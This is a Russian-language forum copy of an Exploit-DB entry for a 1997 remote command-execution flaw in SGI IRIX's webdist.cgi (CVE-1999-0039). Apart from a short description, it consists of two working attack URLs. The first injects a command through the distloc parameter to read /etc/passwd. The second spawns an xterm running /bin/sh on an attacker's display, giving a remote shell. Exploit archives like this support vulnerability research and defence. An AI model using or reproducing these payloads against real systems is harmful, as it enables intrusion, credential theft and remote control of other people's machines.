- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19299
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-1999-0039
- Дата публикации
- 1997-05-06
SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution
Код:
source: https://www.securityfocus.com/bid/374/info
A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed with the privileges of the httpd daemon.
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
or
http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh- Источник
- www.exploit-db.com
